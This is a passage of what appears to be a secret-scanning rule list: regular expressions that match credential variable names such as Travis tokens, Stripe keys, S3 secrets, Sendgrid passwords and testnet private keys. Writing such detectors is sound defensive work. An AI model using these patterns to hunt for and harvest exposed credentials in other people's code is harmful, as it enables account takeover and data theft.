\"(?i)[\\\"']?travis[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?secure[_-]?env[_-]?vars[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?pull[_-]?request[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?e2e[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?com[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?branch[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?token[_-]?core[_-]?java[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?thera[_-]?oss[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?tester[_-]?keys[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?test[_-]?test[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?test[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?tesco[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?svn[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?surge[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?surge[_-]?login[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?stripe[_-]?public[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?stripe[_-]?private[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?strip[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?strip[_-]?publishable[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?stormpath[_-]?api[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?stormpath[_-]?api[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?starship[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?starship[_-]?account[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?location[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?staging[_-]?base[_-]?url[_-]?runscope[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ssmtp[_-]?config[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sshpass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?srcclr[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sqssecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sqsaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spring[_-]?mail[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spotify[_-]?api[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spotify[_-]?api[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spaces[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spaces[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?soundcloud[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?soundcloud[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatypepassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?token[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?token[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?gpg[_-]?passphrase[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonar[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonar[_-]?project[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonar[_-]?organization[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?socrata[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?socrata[_-]?app[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snyk[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snyk[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snoowrap[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snoowrap[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snoowrap[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?slate[_-]?user[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?slash[_-]?developer[_-]?space[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?slash[_-]?developer[_-]?space[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?setsecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?setdstsecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?setdstaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ses[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ses[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?service[_-]?account[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?endpoint[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?default[_-]?org[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendwithus[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?selion[_-]?selenium[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?selion[_-]?log[_-]?level[_-]?dev[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?segment[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secretaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?key[_-]?base[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?9[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?8[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?7[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?6[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?5[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?4[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?3[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?11[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?10[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?1[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?0[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sdr[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?scrutinizer[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sauce[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sandbox[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sacloud[_-]?api[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sacloud[_-]?access[_-]?token[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sacloud[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?user[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?secret[_-]?assets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?secret[_-]?app[_-]?logs[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?key[_-]?assets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?key[_-]?app[_-]?logs[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?bucket[_-]?name[_-]?assets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rubygems[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rtd[_-]?store[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rtd[_-]?key[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?route53[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ropsten[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rinkeby[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rest[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?repotoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?reporting[_-]?webdav[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?reporting[_-]?webdav[_-]?pwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?release[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?release[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?registry[_-]?secure[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?registry[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rediscloud[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?redis[_-]?stunnel[_-]?urls[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?randrmusicapiaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rabbitmq[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?quip[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?qiita[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pypi[_-]?passowrd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pushover[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 